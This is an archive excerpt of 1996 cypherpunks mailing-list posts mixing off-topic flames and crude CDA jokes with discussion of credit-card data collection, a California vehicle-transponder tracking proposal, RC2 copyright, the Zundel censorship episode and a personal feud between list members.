Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 5 Feb 1996 07:24:13 +0800
To: Don <don@cs.byu.edu>
Subject: Re: Wading through lame crap, plus on-topic privacy stuff
In-Reply-To: <ML-2.0.823473101.7349.don@wero.cs.byu.edu>
Message-ID: <Pine.SOL.3.91.960204150405.379A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Even your on-topic stuff wasn't really on-topic "-)

You can relax - the bank doesn't have a bunch of PIs snooping around to 
find out what you're up to. What actually happens is that the university 
sells the list of registered students to various organisations for use in 
direct-mail campaigns. 


(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Mon, 5 Feb 1996 15:43:31 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199602042117.PAA05965@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


> Could someone tell me how to quit this list, I just dont
> have the time to read anything that is being sent to it.

Yes. You can turn your modem off :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Mon, 5 Feb 1996 03:51:38 +0800
To: cypherpunks@toad.com
Subject: How do I quit list?
In-Reply-To: <Ql5DNOuMc50e12cBg_@nsb.fv.com>
Message-ID: <Pine.A32.3.91.960204152243.66031B-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


Could someone tell me how to quit this list, I just dont have the time to 
read anything that is being sent to it.

Thanks

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Mon, 5 Feb 1996 06:58:48 +0800
To: cypherpunks@toad.com
Subject: Wading through lame crap, plus on-topic privacy stuff
In-Reply-To: <Pine.BSD.3.91.960204043412.13565C-100000@ahcbsd1.ovnet.com>
Message-ID: <ML-2.0.823473101.7349.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>   Neither dropping nuclear weapons on Japanese cities nor an invasion 
>   of Japan was necessary to secure surrender of the Japanese government. 

Doesn't anyone bother to delete cpunks from the CC before sending this off
topic stuff? And since I know it's coming, please refrain from trying to
relate it to anything relevant here with some kind of japan-crypto or
wrongful governmental action ObCrypto's. What I had for lunch is just as
irrelevant, but that doesn't mean it becomes relevant if I can somehow
involve encryption.


Dangit, wheres my procmail. Does anyone use gnus for this list? I think
I need a scoring system.


Now for the on-topic stuff. Looking through my mail yesterday, noticed a
credit card application from BofA. Despite the fact that they didn't want
to give me a card three years ago, they have offered a student card to me.
I figured that it was a lucky guess, them knowing I'm a student again. Then
I noticed they were kind enough to fill in my school ("Main Campus" too) into
the appropriate blank. Now, that's either a really good guess, or else they've
been out looking me up. I'm currently writing a letter to BofA telling them
they can kiss my rear if they're going to go around keeping tabs on me. They
should at least be more careful about letting me on to them.

This got me interested in which companies keep track of what information. I'm
now going to write to my other credit companies and ask something like:

   I am interested in knowing what information your company keeps track of    
   which is not directly related to my credit history, my balance, and my   
   current address. For example, do you maintain or seek out any of the 
   following information:

   Change in Marital Status that don't relate to credit account
   change or loss of employment
   spending habits, ie, types of goods, dollar amounts and locations,
     for any purpose
   credit or bank accounts with other companies, for any purpose

Can anyone suggest anything else to ask about? I know, for example, that some
companies keep track of spending so as to be able to call you up if you, for
example, start buying large numbers of cars in asia. Or maybe they have a red
flag that goes up if you start to max out all your other credit cards or
something. But I've run out of things that I think they're keeping track of
that they don't need to. I suppose DNA samples is probably still a bit away.

Don







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Mon, 5 Feb 1996 05:07:43 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <Pine.ULT.3.91.960204113444.21342B-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.960204152919.1084C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Robert A. Hayden wrote:

> Now that we all have web pages that are naughty and might be seen by 
> little children, I'd like to hve some kind of a graphic that can 
> universally be seen as a "Warning:  The following material is unsuitable 
> for children and close-minded twits".  (or words to that effect).

How about a full-color, actual-size GIF of an erect penis?  I think
that ought to get the message across to most concerned parents that my
web page is not for little Johnny.

   --D.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 5 Feb 1996 07:39:34 +0800
To: Sean Gabb <cypherpunks@toad.com
Subject: Re: enquiry
Message-ID: <ad3a7d6b0e021004548f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 PM 2/4/96, Sean Gabb wrote:
>Is anyone out there able to give me the e-mail address of
>
>        Smith Micro Software, Inc
>        51 Columbia
>        Aliso Veijo
>        California 92656
>
>I need to ask about some software written by them.  Any help would leave
>me very grateful.

Use the Force, Luke!

Smith Micro Software, Inc

51 Columbia
Aliso Viejo, CA 92656
Phones: Main - (714) 362-5800, Sales - (800) 964-7674, Technical Support -
(714) 362-2350, Fax - (714) 362-2300, Automated Fax-On-Demand -
(714) 362-2396, BBS: (714) 362-5822
EMail: CompuServe - 74431,1044; Internet - sales@smithmicro.com


--Tim


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 5 Feb 1996 09:14:26 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Is this email getting through?
Message-ID: <v02120d02ad3b004ede56@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I have not received any CP traffic for several days. Repeated
(re-)subscription requests didn't generate a reply from majordomo. If this
message shows up on the list, please let me know.

Puzzled,

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Mon, 5 Feb 1996 06:17:01 +0800
To: jordan@thinkbank.com
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <199602042156.QAA17688@camus.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


>What if looking at a JPEG were like buying beer?  The default is
>that a 12 year old isn't going to fool the guy at 7-11, but if
>their parents buy a beer and give it to 'em, what the heck?
>Consuming alcohol is not regulated; *purchasing* it is.
>
>Don't forget: the fact that "porno on the net" (for instance) is
>an issue *at all* is a *failure* of technology.  It would be a
>non-issue if USENET wasn't essentially a technology vacuum.

indeed. and Who is doing the most to make sure that the technology
necessary (strong widespread crypto) to make porno on the net a 
non-issue? if the governments of the world weren't such a bunch of 
collective paranoid pricks, i believe we'd be in the process of 
implementing global encryption on the internet and private networks 
as well. 

the public needs to be informed that thus 'failure of technology' is 
completely unnecessary. one of the things that _really_ pisses me off
is that the very same people who are restricting the access of crypto
technology are the ones who are screaming that they need to restrict 
other fundamental freedoms because of the their own stupid policies.

writing this, it is obvious that their policy is entirely reasonable
and in fact necessary if it is your fundamental goal to restrict freedom.
i believe this to be the case when considering governments in general, 
and the u.s. govt. in particular.

amp







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Agre <pagre@weber.ucsd.edu>
Date: Mon, 5 Feb 1996 21:22:45 +0800
To: cypherpunks@toad.com
Subject: Re:  Jamming and privacy problem
Message-ID: <199602050100.RAA21512@weber.ucsd.edu>
MIME-Version: 1.0
Content-Type: text/plain


The emissions tracking proposal might have another sort of relevance to
cryptography.  Assuming (it's a big assumption, but entertain it for a
moment) that we agree that some type of automatic enforcement mechanism
for emissions-based repairs were a good thing, how could it be built
without identifying any individuals to the authorities?  What I find so
utterly over-the-top about the ARB proposal is that it is capable of
maintaining records on everybody everywhere, whether they are violating
any laws or not.  Of course they'll promise to protect privacy, and they
may even promise not to capture any records for people whose emissions
fault codes come up clean (though they say nothing about this in the RFP).
But such assurances would be nonsense, since once the system is in place
a simple software change would cause the system to revert back to the
total-surveillance functionality described in the RFP.  The key, then,
is designing systems so that simple software changes under the control
of the authorities can turn them into instruments of oppression.  This
design consideration is hard to even formulate accurately in the context
of traditional system design methodologies, which assume that everything
in sight comes with identifiers and that *the* way for a system to relate
to something is to represent it in terms of those identifiers.  Digital
cash and other such schemes are so profound precisely because they break
with this underlying assumption, forcing systems to think thoughts like
"this person (whoever s/he may be) has paid $1 to travel on this road",
"this person (whoever s/he may be) is eligible for an upgrade to first
class", "this person (whoever s/he may be) is obeying emissions laws",
and so on.  Philosophers and linguists call these "indexical" (or, more
precisely, "deictic") because they identify an individual contextually
without appealing to a name or other universal identifier.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Mon, 5 Feb 1996 00:17:40 +0800
To: cypherpunks@toad.com
Subject: Re: Alien factoring breakthroughs
Message-ID: <v01510100ad39743778ee@[193.74.216.13]>
MIME-Version: 1.0
Content-Type: text/plain



>The Grays have renegged on their abduction quota agreement, and are
>abducting many more people than before. Most of these are returned, after
>being implanted with a device which allows the grays to have total control
>over their thoughts and actions. Approximately 40% of Americans now carry
>one of these devices, which are impossible to remove without killing the
>host.
>

The mark of a good conspiracy theory is its untestability.  Your theory
fails here, because you could perform autopsies on those hosts who have
died of natural causes to recover the mind control devices.

Suggest you amend the last sentence to read "...one of these devices, which
dissolve immediately upon death, and which are impossible to remove..."
etc, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 5 Feb 1996 11:23:28 +0800
To: cypherpunks@toad.com
Subject: Re: Our "New Order"
Message-ID: <m0tjFiu-0008zmC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 2/4/96 GMT, Mutatis Mutantdis wrote:
>On Sat, 3 Feb 1996 11:30:48 -0700, David M. Rose wrote:
>
>>In view of the fact that our government seems bent on abrogating its
>>citizens' rights to free speech, has anyone done a survey indicating which
>>foreign countries have the best Net connections to the U.S. (excepting, of
>>course, Germany and possibly France)?
>
>>It may be expedient for Planned Parenthood and others whose points of view
>>differ somewhat from those approved under our "New Order"* to explore
>>alternatives in order to reach their constituencies.
>
>The law makes anyone accessing material lable... even if you connect
>to a foreign site where it's legal there, if it's banned in the US,
>you can still get screwed (in theory).
>
>Methinks the time is right for a "PGPScape" web browser.
>
>Rob.

Let me see if I understand  this concept correctly.  The remote site would
pre-encrypt the transmitted data, so that when received it could be
decrypted by the requestor according to his (or a temporarily chosen, to
avoid disclosing the actual recipient.) public key, so as to disguise both
the material and perhaps also the actual requestor?

Excellent idea!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gibo@ripco.com (Giles Bowkett)
Date: Mon, 5 Feb 1996 09:21:55 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks-d V2 #480
Message-ID: <v01530502bc46ab79df0e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


>From: Cecelia A Clancy <cacst9+@pitt.edu>
>Date: Sat, 3 Feb 1996 18:06:32 -0500 (EST)
>Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
>
>On Sat, 3 Feb 1996 ErnstZundl@aol.com wrote:
>
>Ernst Zu"ndel's e-mail address is ezundel@cts.com.  He is on on
>AOL to me knowledge.

[snip]

>The above text does not feel like Zu"ndel to me.  I think
>that this ErnstZundel@aol.com might very well be an imposter.
>The above is not the real Zu"ndel's speaking or writing
>style.  Zu"ndel does not want books burned and people persecuted
>nor does he want certain races and ethnic groups declared
>inferior.

<amazement gaze="slackjawed">
My God, you're kidding!  The Zundel post might have been a JOKE?!  But I
believed every word of it!
</amazement>


=========================================>>>http://pages.ripco.com/~gibo

"Tree-borne kettle-girl...I love you."  -- from Ranma 1/2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 5 Feb 1996 11:16:05 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Sound bites re the Zundel German censorship thing (fwd)
Message-ID: <Pine.ULT.3.91.960204175659.2292Q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Bcc'd to the webcom.com guys FYI]

Sorry if you get duplicate copies, but I agree with Tim that mailing list
cross-pollution is bad. 

*Not* for broader redistribution, because they deserve privacy, but 
illustrative for, say, certain knee-jerk anti-PC forces here, is the fact 
that the two people who run webcom.com (Bcc'd) have been reported to be:

1. Grandson of a Holocaust victim
2. Activist with PEN and Amnesty International

I think we're all on the right side here, and for all the right reasons.

-rich

---------- Forwarded message ----------
Date: Sun, 4 Feb 1996 17:56:19 -0800
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: fight-censorship+@andrew.cmu.edu
Newgroups: alt.censorship, comp.org.eff.talk, alt.internet.media-coverage
Subject: Maudlin sound bites re the Zundel German censorship thing

I put this together for the few journalists who actually bothered to ask
for quotes, rather than taking or manufacturing them without asking. 

Sent to CMU fight-censorship and relevant newsgroups (not counting
alt.revisionism, where this is not really relevant); will also send
separately to cypherpunks. I'm not on any other lists, but feel free to
pass it along, with PGP signature intact. 

-rich

---------- Forwarded message ----------
Subject: Re: Quote for Guardian newspaper

-----BEGIN PGP SIGNED MESSAGE-----

Please cite me as rich@c2.org without Stanford affiliation. Yes, I can 
handle any amount of mail, and I'd much rather have to answer questions 
than be misinterpreted.

Pick and choose and edit at will. The email address rich@beep.stanford.edu
goes to an alphanumeric pager (cellular beeper, whatever you call it on
your side of the pond) that takes 60 characters from the Subject: line;
please use it to confirm quotes at deadline.

Some material, from least to most maudlin:

I am not a free speech activist. As Rosa Parks explains her refusing to
move to the back of a racially segregated bus, "I was tired." The Internet
belongs to all of us, and if parts of it are cordoned off for even the
most noble political reasons, then we are all diminished, and totalitarian
regimes like China's are given another excuse. This was an important point
to underscore, but it should be noted that all I did was send a half dozen
electronic mail messages and copy a few files, which took less than an
hour of my time. 

No less important than the fight against censorship itself, for me, is
that hateful demagogues like Ernst Zundel be denied their spurious appeals
to "anti-censorship." Mr. Zundel is no more of a free speech activist than
are the leaders of the IRA. Repression only breeds criminality. 

As Tolkien or any good German fairy tale will tell you, the evil troll,
when exposed to the light of day, will turn to stone. Evil trolls like Mr.
Zundel might still frighten children, but as statues in the Wiesenthal
Center's Museum of Tolerance they can no longer harm us; and ultimately,
these statues will attract pigeons, weather with time, and crumble to dust.

Now that the power of the Net has been demonstrated, we have taken down
our mirror sites. Now the onus is on Mr. Zundel, in the spotlight of world
attention, to reveal his true friends by calling on them to come to his
aid. Now we know that Mr. Zundel's friends include Joe Bunkley, a
notorious racist at Georgia State University. Joe Bunkley's mirror site,
and those of other friendly mirror sites, cannot all be censored; in fact,
to my knowledge, no action has been taken against any mirror site. 
Indeed, the DFN/WiN network that serves most German universities 
restored access to Mr. Zundel's original site some days ago. 

Let Mr. Zundel's conspiracy theories about Jews and UFO bases in
Antarctica into the public domain, and let us see who will believe them,
and who will laugh. I am a great fan of Milan Kundera, who teaches us that
the only responses to a totalitarian buffoon are laughter and memory.
Nizkor: we will remember. (No, I'm not Jewish)

Zundel's hate should never be ignored, but it can be publicly refuted and
ridiculed, which has far greater moral and practical effect than
censorship. "Eternal vigilance is the price of liberty" can be 
interpreted many ways. Let freedom ring.

- -rich

On Sun, 4 Feb 1996, Azeem Azhar wrote:

> Hi,
> 
> I'm a journalist on the UK Guardian newspaper
> I'm doing a background piece the Zundel bnusiness.
> Could you give me a short quotable quote about why you're doing it:
> Extreme non-tech if you could.
> ASAP?
> Cool
> 
> Azeem
> 
> Azeem Azhar                            vx: 0171-713 4193
> The Guardian                           fx: 0171-713 4154
> 119 Farringdon Road                    azeem@dial.pipex.com
> London EC1R 3ER                        aa@guardian.co.uk (alt)
> All opinions are my own unless otherwise stated.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRU8nY3DXUbM57SdAQHz7gP/VHY9mkoZ4NdJ3bklnH+cKjCXxcT8uxTb
bSm/+f/iYe06C2XN3g5O5VVDQiPn0jA4aWJCwP1ntkkZmEsYyIBjRCQgMTBvNqt2
7blwHlLsEelJU2AaqMwK6z+4jiOdgp2InXYOjGsFZZaNwn0gCvbhaUbl5uYy4BV5
9tXMt9ZG95k=
=GzMs
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 5 Feb 1996 08:10:43 +0800
To: cypherpunks@toad.com
Subject: Jamming and privacy problem
Message-ID: <01I0TP2E3C9SA0UULQ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It looks like one non-political solution to this problem would be
a gadget to jam the receiver so it can't activate the transponder or,
alternately, receive the transponder's signal. Cryptographic relevance?
They might start doing something tricky with frequencies, etcetera.
	-Allen	

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date:       Sat, 03 Feb 96 10:21:11 EST
From:       Computer Privacy Digest Moderator  <comp-privacy@uwm.edu>
To:         Comp-privacy@uwm.edu
Subject:    Computer Privacy Digest V8#012

Computer Privacy Digest Sat, 03 Feb 96              Volume 8 : Issue: 012

----------------------------------------------------------------------

Date: 01 Feb 1996 19:25:04 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
Subject: Universal Tracking of Road Traffic

I have here the most amazing document.  It is a Request for Proposals
(number 95-7, dated January 1996) from the State of California Air
Resources Board (Research Division, 2020 L Street, Sacramento CA 95814)
entitled "Incorporation of Radio Transponders into Vehicular On-Board
Diagnostic Systems".  The ARB wants someone to build transponders and
receivers that allow computers to automatically poll cars to determine
if their emissions systems are failing, in the process accumulating a
database of the cars' locations on particular dates and times.

According to the RFP, by 1996 new cars and light trucks in California
are required to have onboard systems that illuminate a dashboard light
if the emissions systems are malfunctioning.  Since the appearance of
this light does not ensure that the car's owner will get the emissions
system fixed, the ARB is proposing that new cars and light trucks
starting in the year 2000 (it doesn't say all of them, but it does say
1,000,000 of them) be required to include transponders that can
broadcast the car's VIN number, the emissions system fault codes, the
vehicle's location at the time of the query, and a status code.  The
receivers are supposed to be capable of automatically polling the
"fleet" of cars equipped with transponders and storing in a database
the following information: date and time of current and last query,
VIN, status and fault codes, and "vehicle location (to the zip code
level, and city)".  The contractor also "shall produce a public service
video documenting the system and explaining the concept and the
benefits of such a transponder-assisted approach to enhancing the
present I/M [Inspection and Maintenance] program."

In case it's not clear, the ARB is envisioning a system under which
cars sold in California will be required to incorporate a device ("no
larger than a pack of cigarettes") that the state can use to track its
whereabouts at all times.  This plan poses a greater threat to
individual privacy than automatic toll collection or any other plan
currently under development for non-commercial transport informatics,
so far as I know.  Environmental concerns are real, and the air in Los
Angeles is a crime, but plenty of means are available for alleviating
air pollution without constructing the technological groundwork for an
authoritarian society.

--
Phil Agre

------------------------------

End of Computer Privacy Digest V8 #012
******************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 5 Feb 1996 11:30:01 +0800
To: cypherpunks@toad.com
Subject: RC2 protected by copyright?
Message-ID: <199602050211.SAA18120@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



RSA issued a statement claiming that anyone using RC2(TM) would be in
violation of various laws.  I think that they might have a point.

You can't protect an idea with trade secrets, certainly not a software
idea, if you intend to sell the software.  It is easy to reverse
engineer it; this is probably what happened with RC2.

But, what about copyright?   Now, copyrights cannot protect ideas, only
the expression of those ideas.  An algorithm is clearly an idea, you could
write a program that would implement it in a completely different way,
not just by translating it (translations are still protected by
copyright). 

RC2, though, as 256 bytes of seemingly random data at the head of it,
in a permutation table.  This is clearly not any idea, but a bit of
text.  This text would have to be copied to any interoperable RC2.
(You could surely use some different permutation, and probably most
of the 256! permutations would be equally secure, but would not
interoperate with RC2).  I would expect that this copying of text be
held to be a violation of copyright.

Some might argue that 256 bytes is so small that perhaps it couldn't
be copyrighted.  Copyright clearly can't protect use of a word, or
a short phrase (1000 points of light, say).  If the permutation table
at the beginning was 65536 16-bit numbers, instead of 256 bytes, then
the copyright protection be that much stronger and less open to debate.

Do any of the real lawyers on the list want to take a crack at this?
Has anybody heard any noise from RSA describing exactly how they
intend to go after people?

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Mon, 5 Feb 1996 06:41:40 +0800
To: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Subject: Re: None
In-Reply-To: <199602042117.PAA05965@vishnu.alias.net>
Message-ID: <Pine.A32.3.91.960204181400.51829A-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996, Mr. Boffo wrote:

> > Could someone tell me how to quit this list, I just dont
> > have the time to read anything that is being sent to it.
> 
> Yes. You can turn your modem off :)
> 

Hey Boffo, Don't be an idiot!!  It is hard to turn off your modem when 
you are on a university network.  Don't be so quick to be a smart ass.  
If you don't have anything productive to say then shut the fuck up!!
						  ~~~~~~~~~~~~~~~~~~

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 5 Feb 1996 21:17:28 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] Re: Charter of PDX Cpunk meetings
Message-ID: <m0tjGYV-000938C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:18 AM 2/4/96 -0800, bernardo@alpha.c2.org wrote:
>jim bell wrote:
>
>>> I think an explanation for this is due.  Jim is going to move his 
complaints
>>> here instead of dealing with them with me no matter what I do...
>>
>> Alan Olsen is correct, here.
>
>This is childish and pointless.  Please shut up or take it to email.

Odd that you would say this, even more odd that you would post it to the 
Cypherpunks list.  The only reason I am posting this is that you appear to 
be taking a remarkably similar position to Alan Olsen.

>
>> But he (the anonymous poster):
>> 1.  FLamed me on this national list, similarly to the way Alan Olsen 
later did.
>
>FWIW, this is an _international_ list with a lot of people who are
>just not interested in your petty bickering.  If you want to argue
>about this, please do it in private.

Then why didn't you send me the email directly, and NOT copy the list.  
Somehow, it appears you have a double standard.  The only reason I'm 
responding to you now, ON CYPHERPUNKS, is that you appear to be 
hypocritically asking me to "keep it off the list" at the same time to 
failed to do the same yourself.  Sounds like a double-standard.  Your 
behavior is remarkably remeniscent of Alan Olsen himself.

>  If Alan posts responses to the
>list, that's his problem.  You don't _have_ to answer in public.

It's been pointed out to me that because Alan flamed me in public, 
anonymously, on Cypherpunks, I am entitled to have it known what he did.

>> 2.  Failed to be willing to sustain the debate in a more appropriate list, 
>> even under a stable nym.
>
>You have something against anonymity?  In this case, perhaps this list
>is not the best place to be.

I think you're deliberately pretending to misunderstand.  I have nothing 
against anonymity.  While a "newbie," I was under the impression that the 
term "stable nym" (my usage) refers to an anonymous alias that is 
untraceable.  In fact, it was _I_ who suggested that this anonymous flamer 
(now apparently self-admittedly identified as Alan Olsen himself) adopt a 
stable nym and debate me on some other area more appropriate for the 
subject.  While I do feel there is CP relevance to the digital cash/good 
encryption/network applications of "Assassination Politics," I didn't want 
to force this on what I would like to think of as a "not particularly 
political" list.

(Recent topics have battered the distinction, I realize.  I don't want to 
make it "worse," however.)

>> that I had been flamed by that anonymous poster.  The fact that he was
>> anonymous says it all.  The fact that he has not returned says it all.  The 
>
>The fact that he was anonymous says nothing whatsoever.  So what if
>you received some email agreeing that you'd been flamed?

The point is, some people seem to agree that what this anonymous flamer did 
was against "nettiquette," or at least against CP typical behavior.  Had he 
made his criticisms with a stable nym and been willing to sustain a serious 
debate (possibly on another area) that would have signalled that he was 
believeable and serious.  He was not, however.


>> the fact that I am relatively new here.  I have no intention of inflicting
>> an unwelcome discussion of "Assassination Politics" on the list, and 
>
>Actually, and Perry may disagree here, but I'd have no objection to a
>discussion of "Assassination Politics", or any other nutty political
>theories, as long as we can stick to reasonably mature discussion and
>not flames and petty ego boosting.

"..other nutty political theories"?  Harummmph!  Well, I guess you got your 
"not so subtle" dig in, there.  I'd like to see a bit more widespread 
approval of such a discussion before actively starting it, anyway, 
especially by some of the "old-timers" here.  (Sadly, as I newbie, I don't 
really even know who the "old timers" are!)  But recently, there's been too 
much traffic anyway!


>> suffered any longterm loss of reputation of his own.  I, on the other hand, 
>> use my REAL NAME.
>
>Whoopie!  A True Name!  Big deal.  I care not one jot whether or not
>you use your REAL NAME.  I have no way of knowing if it is, in fact,
>your real name.  Should it make a difference?

Not necessarily.  As I pointed out before, I'm happy to debate a stable nym 
(a term I learned only a few weeks ago, BTW).  But completely anonymous 
flames from a person who cuts and runs does not improve the S/N ratio of 
this or any other list.

>No one is going to "suffer any longterm loss of reputation" by
>disagreeing with you, or anyone else, whether or not they use a nym
>(or anonymity).

I didn't want anybody to even be able to use the excuse of "I feared for my 
life debating with that vile purveyor of that wacky idea, 'Assassination 
Politics.'  "    I invited him to use a stable nym.


>> Only a fool would have taken an anonymous flamer seriously under those 
>> circumstances.
>
>An anonymous post is no less valid for being anonymous. 

You may be surprised that I absolutely agree.  However, the post was not 
merely "anonymous" but flaming, and the poster didn't stick around.  In 
other words, its anonymity didn't do it in, the motivation of the poster 
did, however.

> The only
>advantage of a stable nym, whether or not it's a True Name, is the
>ability to gain (or lose) reputation through the content of its
>posts.  Perhaps a nym with some reputation is taken more seriously
>than an anonymous poster, but so is an unknown nym.  Neither you nor
>Alan has any reputation to speak of (to me, at least), so an anonymous
>post has no less.

But on the other hand, a flaming "debate" on CP doesn't help any of YOU 
guys, the other readers of CP.  


>>> Jim ignored that request and I removed him from the list.
>> 
>> Read:  "Alan Olsen exercised his authority in his own personal fiefdom, the 
>> "PDX Cypherpunks list."
>
>Are you saying he doesn't have that right?  If it's his list, he can
>do whatever the hell he likes with it.

No, I merely translated "Olsen-speak" into language most of the rest of us 
could understand.  He had that right.  On the other hand, the exercise of 
this right displays Olsen's behavior for all to see.  I wanted there to be 
no doubt on the national list what Alan Olsen was doing.


>> On the contrary, I have no interest in dealing with this sleazy character 
in 
>> email.  He was the one who chose a national list to do his flaming and 
>> baiting, and I think he deserves full "credit."
>
>In other words, you are not interested in resolving any problem you
>have with Alan, you just to make a lot of noise in public in an
>attempt to "embarrass" him.  Go play on some other list where this
>kind of thing is appreciated.
>
>>> The following is the last I will say publically on the matter.
>> 
>> You're going to take your bat and ball and "go thwait home!"  You hear your 
>> mommy calling, Alan.
>
>This list periodically devolves into this childishness.  I'm glad Alan
>is not going to say any more. 

I am, too.


> I award Alan 20 Reputation Points for
>being mature enough to walk away (delayed long enough to see whether
>he does)

As long as the record reflects his misbehavior, I am satisfied as well.

Jim Bell
jimbell@pacifier.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRVpWfqHVDBboB2dAQEzVgQAgIjr4L3tYYgoIAe+H25y8b/Z+mIRq+xz
HaTNntpFyBmIO3hGFLYNW90QurXd0sFHgRQJ0ohN103buI1j1NkqX1O7seKv3FaG
0png19/IkbrssZ7QwXUJU5tVuRY9h6eGi7pt2Rdj/OpkL3neyqKmYu3UmmOHZtMa
